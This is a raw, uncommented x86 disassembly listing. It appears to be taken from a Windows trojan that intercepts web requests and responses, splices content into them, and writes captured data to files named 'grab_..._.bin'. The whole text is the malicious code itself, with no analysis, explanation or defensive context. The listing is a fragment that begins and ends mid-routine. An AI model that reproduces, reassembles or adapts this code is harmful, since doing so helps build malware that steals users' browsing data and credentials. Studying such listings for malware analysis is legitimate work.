call dword_40FB78
xor esi, esi
inc esi
loc_41E6F2: ; CODE XREF: .data:0041E61E�j
; .data:0041E639�j
mov eax, esi
pop ebx
loc_41E6F5: ; CODE XREF: .data:0041E5EE�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 83h
dd 640C247Ch, 448B1A75h, 38830824h, 0FF0B75FFh, 15FF3C70h
dd 40FDBCh, 0E85006EBh, 3
db 0C2h, 14h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41E71F proc near ; CODE XREF: sub_41ED7D+6E�p
var_3B8 = byte ptr -3B8h
var_1B0 = byte ptr -1B0h
var_AC = dword ptr -0ACh
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_70 = byte ptr -70h
var_64 = byte ptr -64h
var_54 = dword ptr -54h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3B8h
mov eax, [ebp+74h+arg_0]
mov eax, [eax]
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
xor edi, edi
cmp eax, edi
mov [ebp+74h+var_18], ebx
jz short loc_41E743
cmp eax, 0FFFFFFFFh
jnz short loc_41E7B9
loc_41E743: ; CODE XREF: sub_41E71F+1D�j
push 1000h
call sub_41A81F
pop ecx
mov ecx, [ebp+74h+arg_0]
mov [ecx+48h], eax
mov eax, [ebp+74h+arg_0]
cmp [eax+48h], edi
jnz short loc_41E763
loc_41E75C: ; CODE XREF: sub_41E71F+F3�j
xor eax, eax
jmp loc_41ED73
; ---------------------------------------------------------------------------
loc_41E763: ; CODE XREF: sub_41E71F+3B�j
push edi
push edi
push ebx
push edi
call dword_40FDC4 ; CreateEventW
mov ecx, [ebp+74h+arg_0]
mov [ecx+3Ch], eax
mov eax, [ebp+74h+arg_0]
push offset sub_40D1D5
push dword ptr [eax+8]
call dword_40FB88
mov ecx, [ebp+74h+arg_0]
push 4
mov [ecx+40h], eax
pop esi
lea eax, [ebp+74h+var_14]
push eax
mov eax, [ebp+74h+arg_0]
lea ecx, [eax+44h]
push ecx
push 2Dh
mov [ebp+74h+var_14], esi
push dword ptr [eax+8]
call dword_40FB64
push esi
lea eax, [ebp+74h+arg_0]
push eax
mov eax, [ebp+74h+arg_0]
push 2Dh
push dword ptr [eax+8]
call dword_40FB8C
loc_41E7B9: ; CODE XREF: sub_41E71F+22�j
push 28h
pop esi
lea eax, [ebp+74h+var_54]
push esi
push eax
call sub_41BE72
mov eax, [ebp+74h+arg_0]
mov [ebp+74h+var_54], esi
mov eax, [eax+48h]
pop ecx
pop ecx
mov [ebp+74h+var_40], eax
loc_41E7D4: ; CODE XREF: sub_41E71F+13A�j
; sub_41E71F+186�j
mov eax, [ebp+74h+arg_0]
push eax
push 8
pop esi
push esi
lea ecx, [ebp+74h+var_54]
push ecx
mov [ebp+74h+var_3C], 1000h
push dword ptr [eax+8]
call dword_40FB84
test eax, eax
jnz short loc_41E85E
call dword_40FD78 ; RtlGetLastWin32Error
cmp eax, 3E5h
mov [ebp+74h+var_14], eax
jnz loc_41E8AD
mov eax, [ebp+74h+arg_0]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41E821
inc dword ptr [eax]
jmp loc_41E75C
; ---------------------------------------------------------------------------
loc_41E817: ; CODE XREF: sub_41E71F+112�j
lea eax, [ebp+74h+var_70]
push eax
call dword_40FAF8
loc_41E821: ; CODE XREF: sub_41E71F+EF�j
; sub_41E71F+12C�j
push ebx
push edi
push edi
push edi
lea eax, [ebp+74h+var_70]
push eax
call dword_40FAD4
test eax, eax
jnz short loc_41E817
mov eax, [ebp+74h+arg_0]
push 0BFh
push 0FFFFFFFFh
push edi
add eax, 3Ch
push eax
push ebx
call dword_40FAF4
test eax, eax
jnz short loc_41E821
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+3Ch]
call dword_40FD50 ; ResetEvent
jmp loc_41E7D4
; ---------------------------------------------------------------------------
loc_41E85E: ; CODE XREF: sub_41E71F+D3�j
cmp [ebp+74h+var_3C], edi
mov [ebp+74h+var_14], edi
jz short loc_41E8B0
mov eax, [ebp+74h+arg_0]
mov ecx, [eax+1Ch]
add ecx, [ebp+74h+var_3C]
push ecx
push dword ptr [eax+18h]
call sub_41BE45
cmp eax, edi
pop ecx
pop ecx
jz short loc_41E8AA
mov ecx, [ebp+74h+arg_0]
mov [ecx+18h], eax
mov eax, [ebp+74h+arg_0]
push [ebp+74h+var_3C]
mov ecx, [eax+1Ch]
push dword ptr [eax+48h]
add ecx, [eax+18h]
push ecx
call sub_41A857
mov eax, [ebp+74h+arg_0]
mov ecx, [ebp+74h+var_3C]
add esp, 0Ch
add [eax+1Ch], ecx
jmp loc_41E7D4
; ---------------------------------------------------------------------------
loc_41E8AA: ; CODE XREF: sub_41E71F+15D�j
mov [ebp+74h+var_14], esi
loc_41E8AD: ; CODE XREF: sub_41E71F+E3�j
mov [ebp+74h+var_18], edi
loc_41E8B0: ; CODE XREF: sub_41E71F+145�j
mov eax, [ebp+74h+arg_0]
push 4
lea ecx, [eax+44h]
push ecx
push 2Dh
push dword ptr [eax+8]
call dword_40FB8C
mov eax, [ebp+74h+arg_0]
cmp dword ptr [eax+40h], 0FFFFFFFFh
jnz short loc_41E8D1
xor ecx, ecx
jmp short loc_41E8D4
; ---------------------------------------------------------------------------
loc_41E8D1: ; CODE XREF: sub_41E71F+1AC�j
mov ecx, [eax+40h]
loc_41E8D4: ; CODE XREF: sub_41E71F+1B0�j
push ecx
push dword ptr [eax+8]
call dword_40FB88
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+3Ch]
call dword_40FDAC ; CloseHandle
cmp [ebp+74h+var_18], edi
jz loc_41ECD6
mov eax, [ebp+74h+arg_0]
cmp [eax+34h], edi
jz short loc_41E933
mov ecx, [eax+34h]
cmp byte ptr [ecx], 2Ah
jnz short loc_41E909
cmp byte ptr [ecx+1], 0
jz short loc_41E933
loc_41E909: ; CODE XREF: sub_41E71F+1E2�j
push esi
push edi
push edi
push dword ptr [eax+1Ch]
push dword ptr [eax+18h]
push ecx
call dword_40FD94 ; lstrlenA
push eax
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+34h]
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41ECD6
mov eax, [ebp+74h+arg_0]
loc_41E933: ; CODE XREF: sub_41E71F+1DA�j
; sub_41E71F+1E8�j
mov [ebp+74h+var_8], edi
mov ecx, [eax+24h]
mov edx, [eax+28h]
add edx, ecx
cmp ecx, edx
mov [ebp+74h+var_1C], edi
mov [ebp+74h+var_20], edx
jnb loc_41EB3E
jmp short loc_41E951
; ---------------------------------------------------------------------------
loc_41E94E: ; CODE XREF: sub_41E71F+414�j
mov eax, [ebp+74h+arg_0]
loc_41E951: ; CODE XREF: sub_41E71F+22D�j
movzx esi, word ptr [ecx]
add esi, ecx
movzx edi, word ptr [esi]
add edi, esi
cmp esi, edi
mov [ebp+74h+var_10], edi
jnb loc_41EB3C
cmp edi, edx
jnb loc_41EB3C
xor ebx, ebx
or edx, 0FFFFFFFFh
mov [ebp+74h+var_4], ebx
mov [ebp+74h+var_C], edx
cmp [ecx+4], bx
jz short loc_41E9AF
movzx edx, word ptr [ecx+4]
push 0Bh
push ebx
lea ebx, [ebp+74h+var_4]
push ebx
push dword ptr [eax+1Ch]
push dword ptr [eax+18h]
movzx eax, word ptr [ecx]
sub eax, edx
push eax
add edx, ecx
push edx
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41EB29
mov eax, [ebp+74h+arg_0]
mov edx, [ebp+74h+var_C]
loc_41E9AF: ; CODE XREF: sub_41E71F+25E�j
cmp word ptr [esi+4], 0
jz short loc_41E9EF
movzx ecx, word ptr [esi+4]
push 0Bh
lea edx, [ebp+74h+var_C]
push edx
mov edx, [eax+1Ch]
mov eax, [eax+18h]
sub edx, [ebp+74h+var_4]
add eax, [ebp+74h+var_4]
push 0
push edx
push eax
movzx eax, word ptr [esi]
sub eax, ecx
push eax
add ecx, esi
push ecx
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41EB29
mov eax, [ebp+74h+arg_0]
mov edx, [ebp+74h+var_C]
loc_41E9EF: ; CODE XREF: sub_41E71F+295�j
movzx ecx, word ptr [edi+4]
test cx, cx
jz short loc_41EA02
movzx ebx, word ptr [edi]
movzx ecx, cx
sub ebx, ecx
jmp short loc_41EA04
; ---------------------------------------------------------------------------
loc_41EA02: ; CODE XREF: sub_41E71F+2D7�j
xor ebx, ebx
loc_41EA04: ; CODE XREF: sub_41E71F+2E1�j
cmp word ptr [esi+4], 0
jnz short loc_41EA10
xor edx, edx
mov [ebp+74h+var_C], edx
loc_41EA10: ; CODE XREF: sub_41E71F+2EA�j
test byte ptr [eax+4], 8
jz loc_41EAB0
test edx, edx
jnz short loc_41EA27
mov edx, [eax+1Ch]
sub edx, [ebp+74h+var_4]
mov [ebp+74h+var_C], edx
loc_41EA27: ; CODE XREF: sub_41E71F+2FD�j
mov ecx, [ebp+74h+var_1C]
lea eax, [ebx+edx]
lea eax, [eax+ecx+4]
push eax
lea eax, [ebp+74h+var_8]
push eax
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz loc_41EB39
movzx eax, word ptr [edi+4]
test ax, ax
mov esi, [ebp+74h+var_1C]
jbe short loc_41EA68
movzx eax, ax
add eax, edi
push ebx
push eax
mov eax, [ebp+74h+var_8]
add eax, esi
push eax
call sub_41A857
add esp, 0Ch
add esi, ebx
loc_41EA68: ; CODE XREF: sub_41E71F+330�j
mov eax, [ebp+74h+arg_0]
mov eax, [eax+18h]
add eax, [ebp+74h+var_4]
push [ebp+74h+var_C]
push eax
mov eax, [ebp+74h+var_8]
add eax, esi
push eax
call sub_41A857
mov eax, [ebp+74h+arg_0]
add esp, 0Ch
test byte ptr [eax+4], 80h
jz short loc_41EA91
add esi, [ebp+74h+var_C]
jmp short loc_41EAA3
; ---------------------------------------------------------------------------
loc_41EA91: ; CODE XREF: sub_41E71F+36B�j
mov eax, [ebp+74h+var_8]
push [ebp+74h+var_C]
add eax, esi
push eax
call sub_41A649
pop ecx
pop ecx
add esi, eax
loc_41EAA3: ; CODE XREF: sub_41E71F+370�j
mov eax, [ebp+74h+var_8]
mov byte ptr [esi+eax], 0Ah
inc esi
mov [ebp+74h+var_1C], esi
jmp short loc_41EB29
; ---------------------------------------------------------------------------
loc_41EAB0: ; CODE XREF: sub_41E71F+2F5�j
mov edi, [eax+1Ch]
sub edi, edx
add edi, ebx
push edi
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jz short loc_41EB26
push [ebp+74h+var_4]
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+18h]
push esi
call sub_41A857
mov eax, [ebp+74h+var_10]
movzx ecx, word ptr [eax+4]
add ecx, eax
mov eax, [ebp+74h+var_4]
push ebx
push ecx
add eax, esi
push eax
call sub_41A857
mov eax, [ebp+74h+arg_0]
mov ecx, [eax+1Ch]
mov eax, [eax+18h]
sub ecx, [ebp+74h+var_C]
add eax, [ebp+74h+var_C]
sub ecx, [ebp+74h+var_4]
add eax, [ebp+74h+var_4]
push ecx
push eax
lea eax, [esi+ebx]
add eax, [ebp+74h+var_4]
push eax
call sub_41A857
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+18h]
call sub_41A83D
mov eax, [ebp+74h+arg_0]
mov [eax+18h], esi
mov eax, [ebp+74h+arg_0]
add esp, 28h
mov [eax+1Ch], edi
loc_41EB26: ; CODE XREF: sub_41E71F+3A3�j
mov edi, [ebp+74h+var_10]
loc_41EB29: ; CODE XREF: sub_41E71F+284�j
; sub_41E71F+2C4�j ...
movzx ecx, word ptr [edi]
mov edx, [ebp+74h+var_20]
add ecx, edi
cmp ecx, edx
jb loc_41E94E
loc_41EB39: ; CODE XREF: sub_41E71F+320�j
mov eax, [ebp+74h+arg_0]
loc_41EB3C: ; CODE XREF: sub_41E71F+241�j
; sub_41E71F+249�j
xor edi, edi
loc_41EB3E: ; CODE XREF: sub_41E71F+227�j
test byte ptr [eax+4], 8
jz loc_41EC44
cmp [ebp+74h+var_8], edi
jz loc_41EC44
lea ecx, [ebp+74h+var_10]
push ecx
mov [ebp+74h+var_10], 0FFFh
push dword ptr [eax+48h]
push 22h
push dword ptr [eax+8]
call dword_40FB64
test eax, eax
jnz short loc_41EB7A
mov eax, [ebp+74h+arg_0]
mov [ebp+74h+var_10], edi
mov eax, [eax+48h]
mov byte ptr [eax], 0
loc_41EB7A: ; CODE XREF: sub_41E71F+44D�j
mov eax, [ebp+74h+var_8]
mov ebx, [ebp+74h+var_1C]
mov byte ptr [ebx+eax], 0
mov eax, [ebp+74h+arg_0]
test byte ptr [eax+4], 40h
jz loc_41EC15
push 3Ch
pop esi
lea eax, [ebp+74h+var_AC]
push esi
push eax
call sub_41BE72
pop ecx
pop ecx
lea eax, [ebp+74h+var_1B0]
mov [ebp+74h+var_9C], eax
lea eax, [ebp+74h+var_AC]
push eax
mov eax, [ebp+74h+arg_0]
push edi
push [ebp+74h+var_10]
mov [ebp+74h+var_AC], esi
mov esi, 103h
mov [ebp+74h+var_98], esi
push dword ptr [eax+48h]
call dword_40FB58
lea eax, [ebp+74h+var_2C]
push eax
call dword_40FE8C ; GetSystemTime
movzx eax, [ebp+74h+var_26]
push eax
movzx eax, [ebp+74h+var_2A]
push eax
movzx eax, [ebp+74h+var_2C]
sub eax, 7D0h
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push offset aGrab_S_02u_02u ; "grab_%S_%02u_%02u_%02u.bin"
lea eax, [ebp+74h+var_3B8]
push esi
push eax
call dword_40FC84
push ebx
push [ebp+74h+var_8]
lea eax, [ebp+74h+var_3B8]
push eax
call sub_41CD76
add esp, 28h
jmp short loc_41EC38
; ---------------------------------------------------------------------------
loc_41EC15: ; CODE XREF: sub_41E71F+46C�j
push [ebp+74h+var_8]
push dword ptr [eax+48h]
mov eax, [ebp+74h+var_10]
lea eax, [eax+ebx+1Eh]
push eax
mov eax, dword_40FB34
push dword ptr [eax+188h]
push 5
call sub_41CAA9
add esp, 14h
loc_41EC38: ; CODE XREF: sub_41E71F+4F4�j
push [ebp+74h+var_8]
call sub_41A83D
mov eax, [ebp+74h+arg_0]
pop ecx
loc_41EC44: ; CODE XREF: sub_41E71F+423�j
; sub_41E71F+42C�j
cmp [eax+2Ch], edi
jz short loc_41EC91
mov ecx, [eax+2Ch]
cmp byte ptr [ecx], 0
jz short loc_41EC91
push dword_4102F0
call sub_41A83D
push dword_4102F4
call sub_41A83D
mov eax, [ebp+74h+arg_0]
push 0FFFFFFFFh
push dword ptr [eax+2Ch]
call sub_41BC6D
mov dword_4102F0, eax
mov eax, [ebp+74h+arg_0]
push 0FFFFFFFFh
push dword ptr [eax+30h]
call sub_41BC6D
mov dword_4102F4, eax
mov eax, [ebp+74h+arg_0]
add esp, 18h
loc_41EC91: ; CODE XREF: sub_41E71F+528�j
; sub_41E71F+530�j
test word ptr [eax+4], 100h
jz short loc_41ECD9
cmp [eax+30h], edi
jz short loc_41ECD9
push dword ptr [eax+30h]
call dword_40FD94 ; lstrlenA
push eax
mov eax, [ebp+74h+arg_0]
push dword ptr [eax+30h]
lea eax, [ebp+74h+var_64]
push eax
call sub_41B6F9
add esp, 0Ch
lea eax, [ebp+74h+var_2C]
push eax
call dword_40FE8C ; GetSystemTime
push 10h
lea eax, [ebp+74h+var_2C]
push eax
lea eax, [ebp+74h+var_64]
push eax
call sub_41B9E9
add esp, 0Ch
loc_41ECD6: ; CODE XREF: sub_41E71F+1CE�j
; sub_41E71F+20B�j
mov eax, [ebp+74h+arg_0]
loc_41ECD9: ; CODE XREF: sub_41E71F+578�j
; sub_41E71F+57D�j
push dword ptr [eax+48h]
call sub_41A83D
mov eax, [ebp+74h+arg_0]
or dword ptr [eax+4], 4
pop ecx
mov ebx, offset dword_4102F8
push ebx
call dword_40FE84 ; RtlEnterCriticalSection
mov esi, [ebp+74h+arg_0]
push dword ptr [esi+8]
call sub_41DA61
add esi, 4
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41ED20
imul eax, 38h
add eax, dword_4102EC
push 38h
push esi
push eax
call sub_41A857
add esp, 0Ch
jmp short loc_41ED2F
; ---------------------------------------------------------------------------
loc_41ED20: ; CODE XREF: sub_41E71F+5E8�j
call sub_41DB0D
mov [ebp+74h+var_18], edi
mov [ebp+74h+var_14], 6
loc_41ED2F: ; CODE XREF: sub_41E71F+5FF�j
push ebx
call dword_40FE88 ; RtlLeaveCriticalSection
mov eax, [ebp+74h+arg_0]
mov ecx, [eax]
cmp ecx, edi
jbe short loc_41ED69
cmp ecx, 0FFFFFFFFh
jz short loc_41ED69
mov ecx, [ebp+74h+var_14]
mov [ebp+74h+var_20], ecx
mov ecx, [ebp+74h+var_18]
mov [ebp+74h+var_24], ecx
push 8
lea ecx, [ebp+74h+var_24]
push ecx
push 64h
push dword ptr [eax+44h]
push dword ptr [eax+8]
call sub_41E2E3
mov eax, [ebp+74h+arg_0]
add esp, 14h
loc_41ED69: ; CODE XREF: sub_41E71F+61E�j
; sub_41E71F+623�j
push eax
call sub_41A83D
mov eax, [ebp+74h+var_18]
pop ecx
loc_41ED73: ; CODE XREF: sub_41E71F+3F�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn 4
sub_41E71F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED7D proc near ; CODE XREF: .data:0041F389�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
and dword ptr [ebx], 0
push esi
mov esi, [ebp+arg_0]
imul esi, 38h
add esi, dword_4102EC
push edi
xor edi, edi
inc edi
test byte ptr [esi], 4
jnz short loc_41EE17
mov eax, [esi+4]
push 4Ch
mov [ebp+arg_C], eax
call sub_41A81F
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41EDB8
loc_41EDB1: ; CODE XREF: sub_41ED7D+88�j
xor eax, eax
jmp loc_41EE67
; ---------------------------------------------------------------------------
loc_41EDB8: ; CODE XREF: sub_41ED7D+32�j
push 4Ch
push edi
call sub_41BE72
push 38h
lea eax, [edi+4]
push esi
push eax
call sub_41A857
add esp, 14h
cmp [ebp+arg_4], 0
jnz short loc_41EDDE
cmp [ebp+arg_8], 0
jnz short loc_41EDDE
or dword ptr [edi], 0FFFFFFFFh
loc_41EDDE: ; CODE XREF: sub_41ED7D+56�j
; sub_41ED7D+5C�j
mov esi, offset dword_4102F8
push esi
call dword_40FE88 ; RtlLeaveCriticalSection
push edi
call sub_41E71F
push esi
mov edi, eax
call dword_40FE84 ; RtlEnterCriticalSection
push [ebp+arg_C]
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41EDB1
imul eax, 38h
add eax, dword_4102EC
mov esi, eax
test byte ptr [esi], 4
jz short loc_41EE65
loc_41EE17: ; CODE XREF: sub_41ED7D+1E�j
test edi, edi
jz short loc_41EE65
mov eax, [esi+18h]
sub eax, [esi+1Ch]
mov [ebx], eax
jnz short loc_41EE2A
xor eax, eax
inc eax
jmp short loc_41EE67
; ---------------------------------------------------------------------------
loc_41EE2A: ; CODE XREF: sub_41ED7D+A6�j
cmp [ebp+arg_4], 0
jnz short loc_41EE6C
cmp [ebp+arg_8], 0
jnz short loc_41EE6C
mov cl, 1
mov [ebp+arg_8], 1000h
loc_41EE3F: ; CODE XREF: sub_41ED7D+F1�j
cmp eax, [ebp+arg_8]
jb short loc_41EE47
mov eax, [ebp+arg_8]
loc_41EE47: ; CODE XREF: sub_41ED7D+C5�j
test cl, cl
mov [ebx], eax
jnz short loc_41EE65
push eax
mov eax, [esi+14h]
add eax, [esi+1Ch]
push eax
push [ebp+arg_4]
call sub_41A857
mov eax, [ebx]
add esp, 0Ch
add [esi+1Ch], eax
loc_41EE65: ; CODE XREF: sub_41ED7D+98�j
; sub_41ED7D+9C�j ...
mov eax, edi
loc_41EE67: ; CODE XREF: sub_41ED7D+36�j
; sub_41ED7D+AB�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41EE6C: ; CODE XREF: sub_41ED7D+B1�j
; sub_41ED7D+B7�j
xor cl, cl
jmp short loc_41EE3F
sub_41ED7D endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, offset dword_4102F8
push esi
call dword_40FE84 ; RtlEnterCriticalSection
mov edi, [ebp+8]
push edi
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41EEA1
imul eax, 38h
add eax, dword_4102EC
test byte ptr [eax], 2
jz short loc_41EEA1
mov edi, [eax+10h]
loc_41EEA1: ; CODE XREF: .data:0041EE8E�j
; .data:0041EE9C�j
push esi
call dword_40FE88 ; RtlLeaveCriticalSection
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push edi
call dword_40FB60
pop edi
pop esi
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
mov esi, offset dword_4102F8
push esi
call dword_40FE84 ; RtlEnterCriticalSection
mov edi, [ebp+8]
push edi
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41EEF2
imul eax, 38h
add eax, dword_4102EC
test byte ptr [eax], 2
jz short loc_41EEF2
mov edi, [eax+10h]
loc_41EEF2: ; CODE XREF: .data:0041EEDF�j
; .data:0041EEED�j
push esi
call dword_40FE88 ; RtlLeaveCriticalSection
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push edi
call dword_40FB90
pop edi
pop esi
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov ecx, dword_4102E8
xor eax, eax
test ecx, ecx
jbe short loc_41EF5A
mov edx, dword_4102EC
push esi
lea esi, [edx+10h]
push edi
loc_41EF2C: ; CODE XREF: .data:0041EF39�j
mov edi, [esi]
cmp edi, [ebp+8]
jz short loc_41EF3D
inc eax
add esi, 38h
cmp eax, ecx
jb short loc_41EF2C
jmp short loc_41EF58
; ---------------------------------------------------------------------------
loc_41EF3D: ; CODE XREF: .data:0041EF31�j
push dword ptr [ebp+18h]
imul eax, 38h
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [eax+edx+4]
call sub_41E2E3
add esp, 14h
loc_41EF58: ; CODE XREF: .data:0041EF3B�j
pop edi
pop esi
loc_41EF5A: ; CODE XREF: .data:0041EF1F�j
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 438h
push ebx
push esi
mov esi, [ebp+8]
xor ebx, ebx
push ebx
push ebx
push ebx
mov [esi+0Ch], bl
mov eax, dword_40FB34
push ebx
push dword ptr [eax+38h]
call dword_40FB3C
mov ecx, [esi+4]
mov [ecx+8], eax
mov eax, [esi+4]
mov ecx, [eax+8]
cmp ecx, ebx
jz loc_41F14B
mov eax, [esi+8]
movzx edx, word ptr [eax+18h]
push ebx
push ebx
push 3
push ebx
push ebx
push edx
push dword ptr [eax+10h]
push ecx
call dword_40FB48
mov ecx, [esi+4]
mov [ecx+0Ch], eax
mov eax, [esi+4]
cmp [eax+0Ch], ebx
jz loc_41F14B
mov eax, [esi+8]
push edi
push dword ptr [esi]
push dword ptr [eax+2Ch]
call sub_41D739
mov edi, eax
mov eax, [esi+8]
cmp dword ptr [eax+0Ch], 4
pop ecx
pop ecx
jnz short loc_41EFE3
mov ecx, 800000h
jmp short loc_41EFE5
; ---------------------------------------------------------------------------
loc_41EFE3: ; CODE XREF: .data:0041EFDA�j
xor ecx, ecx
loc_41EFE5: ; CODE XREF: .data:0041EFE1�j
cmp edi, ebx
mov edx, edi
jnz short loc_41EFEE
mov edx, [eax+2Ch]
loc_41EFEE: ; CODE XREF: .data:0041EFE9�j
mov eax, [esi]
push ebx
or ecx, 8004F200h
push ecx
push ebx
push eax
push ebx
push edx
add eax, 404h
push eax
mov eax, [esi+4]
push dword ptr [eax+0Ch]
call dword_40FB4C
mov ecx, [esi+4]
push edi
mov [ecx+10h], eax
call sub_41A83D
mov eax, [esi+4]
cmp [eax+10h], ebx
pop ecx
jz loc_41F14A
push ebx
lea eax, [ebp+8]
push eax
lea eax, [ebp-38h]
push eax
mov eax, [esi]
push 80000001h
mov dword ptr [ebp+8], 31h
push dword ptr [eax+420h]
call dword_40FB60
test eax, eax
jz short loc_41F053
cmp [ebp+8], ebx
jnz short loc_41F068
loc_41F053: ; CODE XREF: .data:0041F04C�j
mov eax, dword_40FB34
push dword ptr [eax+13Ch]
lea eax, [ebp-38h]
push eax
call dword_40FDA0 ; lstrcpyA
loc_41F068: ; CODE XREF: .data:0041F051�j
push dword_40FD20
lea eax, [ebp-38h]
push eax
mov eax, dword_40FB34
push dword ptr [eax+144h]
mov edi, 3FFh
lea eax, [ebp-438h]
push edi
push eax
call dword_40FC88
add esp, 14h
push 0A0000000h
push 0FFFFFFFFh
lea eax, [ebp-438h]
push eax
mov eax, [esi+4]
push dword ptr [eax+10h]
call dword_40FB78
mov eax, [esi+4]
push 40D9ECh
push dword ptr [eax+10h]
call dword_40FB88
mov eax, [esi]
push dword ptr [eax+41Ch]
push dword ptr [eax+418h]
mov eax, [esi+4]
push ebx
push ebx
push dword ptr [eax+10h]
call dword_40FB50
test eax, eax
jz short loc_41F14A
push ebx
lea eax, [ebp+8]
push eax
lea eax, [ebp-4]
push eax
mov eax, [esi+4]
push 20000013h
mov dword ptr [ebp+8], 4
mov [ebp-4], ebx
push dword ptr [eax+10h]
call dword_40FB60
test eax, eax
jz short loc_41F14A
cmp dword ptr [ebp-4], 0C8h
jnz short loc_41F14A
lea eax, [ebp+8]
push eax
lea eax, [ebp-438h]
push eax
mov eax, [esi+4]
push 22h
mov [ebp+8], edi
push dword ptr [eax+10h]
call dword_40FB64
test eax, eax
jz short loc_41F146
cmp dword ptr [ebp+8], 5
jbe short loc_41F146
push dword ptr [ebp+8]
lea eax, [ebp-438h]
push eax
call sub_41E26B
pop ecx
pop ecx
loc_41F146: ; CODE XREF: .data:0041F12D�j
; .data:0041F133�j
mov byte ptr [esi+0Ch], 1
loc_41F14A: ; CODE XREF: .data:0041F021�j
; .data:0041F0DC�j ...
pop edi
loc_41F14B: ; CODE XREF: .data:0041EF91�j
; .data:0041EFBB�j
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 574h
or dword ptr [ebp-4], 0FFFFFFFFh
push ebx
push esi
push edi
push 3Ch
pop ebx
lea eax, [ebp-54h]
push ebx
push eax
call sub_41BE72
mov edi, 104h
lea eax, [ebp-174h]
push edi
push eax
call sub_41BE72
mov esi, 400h
lea eax, [ebp-574h]
push esi
push eax
call sub_41BE72
lea eax, [ebp-174h]
mov [ebp-44h], eax
lea eax, [ebp-574h]
mov [ebp-24h], esi
mov esi, [ebp+10h]
mov [ebp-28h], eax
movzx eax, word ptr [esi+6]
mov [ebp-54h], ebx
xor ebx, ebx
add esp, 18h
add eax, esi
test byte ptr [esi+2], 4
mov [ebp-40h], edi
mov edi, [ebp+0Ch]
mov [ebp-8], ebx
jz short loc_41F1DB
movzx ecx, word ptr [esi+4]
add ecx, esi
push ecx
push edi
push eax
call sub_41D679
add esp, 0Ch
mov [ebp-8], eax
loc_41F1DB: ; CODE XREF: .data:0041F1C5�j
lea ecx, [ebp-54h]
push ecx
push ebx
push ebx
push eax
call dword_40FB58
cmp eax, ebx
jz loc_41F2D2
push 2
push dword ptr [edi+420h]
call sub_41DA90
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+8], eax
jz loc_41F2D2
imul eax, 38h
add eax, dword_4102EC
push ebx
push ebx
mov [ebp-14h], eax
lea eax, [ebp-18h]
push eax
push 40DA38h
push ebx
lea ecx, [ebp-54h]
push ebx
mov [ebp-18h], edi
mov [ebp-10h], ecx
mov [ebp-0Ch], bl
call dword_40FE10 ; CreateThread
mov [ebp+10h], eax
loc_41F239: ; CODE XREF: .data:0041F26F�j
xor edi, edi
inc edi
jmp short loc_41F248
; ---------------------------------------------------------------------------
loc_41F23E: ; CODE XREF: .data:0041F258�j
lea eax, [ebp-70h]
push eax
call dword_40FAF8
loc_41F248: ; CODE XREF: .data:0041F23C�j
push edi
push ebx
push ebx
push ebx
lea eax, [ebp-70h]
push eax
call dword_40FAD4
test eax, eax
jnz short loc_41F23E
push 0BFh
push 0FFFFFFFFh
push ebx
lea eax, [ebp+10h]
push eax
push edi
call dword_40FAF4
test eax, eax
jnz short loc_41F239
push dword ptr [ebp+10h]
call dword_40FDAC ; CloseHandle
cmp byte ptr [ebp-0Ch], 1
jnz short loc_41F2CA
cmp [esi+0Ch], bx
mov [ebp-4], edi
jbe short loc_41F2D2
push dword_4102F0
call sub_41A83D
push dword_4102F4
call sub_41A83D
movzx eax, word ptr [esi+0Ch]
add eax, esi
push 0FFFFFFFFh
push eax
call sub_41BC6D
mov dword_4102F0, eax
movzx eax, word ptr [esi+4]
add eax, esi
push 0FFFFFFFFh
push eax
call sub_41BC6D
add esp, 18h
mov dword_4102F4, eax
jmp short loc_41F2D2
